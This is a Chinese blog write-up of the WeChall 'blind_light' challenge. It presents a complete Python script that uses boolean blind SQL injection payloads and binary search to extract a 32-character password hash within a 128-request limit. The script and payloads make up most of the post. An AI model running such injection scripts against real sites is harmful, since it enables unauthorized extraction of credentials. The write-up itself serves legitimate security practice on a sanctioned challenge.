一个盲注(附盲注脚本)

这两天做这个Wechall的盲注，本来不想发Wechall的题解，但是这个题拖了我两天时间，发出来纪念下…………

题目链接

就是个简单的盲注，正误通过页面有无关键字确定。但是有请求次数限制，128次。

需要我猜的密码，长度是32，每一位组成元素有16种可能。也就是说，如果顺序查找，按算法复杂度O(n)算，一位最多可能跑16次，远超128次限制。所以考虑用二分法来猜，二分法算法复杂度O(logn)，刚好，每一位猜4次一定能猜出来，总共128次。

然后，因为主要限制是比较次数，所以猜一个字符时，只比较一次，即是否大于等于。

解题脚本如下：

import requests
import string

url = "http://www.wechall.net/challenge/blind_light/index.php"
cookies = {'WC': 'XXXXXX'}
success_flag = "Welcome back, user. You would now be logged in"
count = 0
proxy = {
    'http': 'socks5://127.0.0.1:1080',
    'https': 'socks5://127.0.0.1:1080'
}
bit_list = list('0123456789ABCDEF')
ac_dict = dict()


def init_ac_dict():
    for i, bit in enumerate(bit_list):
        ac_dict[i] = 0


def debug(msg):
    if debug_mode:
        print "[*]", msg


def getdata_for_onebit(position, payload):
    '''
    payload like: 1' or mid(length(b.password),{position},1)>=char({ascii})#
    '''
    start_bit = 0
    end_bit = len(bit_list) - 1

    while end_bit >= start_bit:
        mid = start_bit + int(round((float(end_bit)-float(start_bit))/2))
        debug("start_bit: {}, end_bit: {}, mid: {}".format(
            start_bit, end_bit, mid))

        now_payload = payload.format(position=position, ascii=bit_list[mid])
        debug("Sending Payload: \""+now_payload+'"')
        while True:
            try:
                rq = requests.post(url, data={
                                   'injection': now_payload, 'inject': 'inject'}, cookies=cookies, timeout=None, proxies=proxy)
            except Exception as e:
                raise e
            else:
                break
        if success_flag in rq.content:
            debug("Last Payload Success")
            if end_bit == mid:
                start_bit = end_bit
                break
            else:
                start_bit = mid
        else:
            debug("Last Payload Error")
            if end_bit == mid:
                break
            else:
                end_bit = mid - 1
    debug(bit_list[start_bit])
    return bit_list[start_bit]


def get_password_length():
    payload = "1' or mid(length(b.password),{position},1)>='{ascii}'#"
    bit_position = 1
    result = ""
    while bit_position <= 2:
        debug("Getting {}th bit".format(bit_position))
        temp = getdata_for_onebit(bit_position, payload)
        if temp is None:
            break
        else:
            result += temp
        bit_position += 1
    return result


def get_password(length):
    payload = "1' or mid(b.password,{position},1)>='{ascii}'#"
    bit_position = 1
    result = ""
    while bit_position <= length:
        debug("Getting {}th bit".format(bit_position))
        temp = getdata_for_onebit(bit_position, payload)
        if temp is None:
            break
        else:
            result += temp
        bit_position += 1
    return result

if __name__ == '__main__':
    debug_mode = True
    while True:
        password = get_password(32)
        rq = requests.post(url, data={
                           'thehash': password, 'mybutton': 'Enter'}, cookies=cookies, timeout=None, proxies=proxy)
        if 'We are sorry but it took you' in rq.content or "Your answer is wrong" in rq.content:
            print "[*] Not PASS", '.'*8, password
            print rq.content
            exit(998)
            rq = requests.get(
                url+"?reset=me", cookies=cookies, timeout=None, proxies=proxy)
        else:
            print "[!] PASS", '.'*8, password
            break

哎，其实主要是二分法老是写错。最开始我用的不是>=而是>，这样平均会多一次请求。

如果用>判断，要找的位置会大于等于左侧，小于等于右侧，所以最后可能需要多一次判断，看是左侧值还是右侧值。

但是用>=判断，要找的位置会大于等于左侧，小于右侧，少了一次判断。

哎，没想到连二分法都不会写了……发博客警示下自己……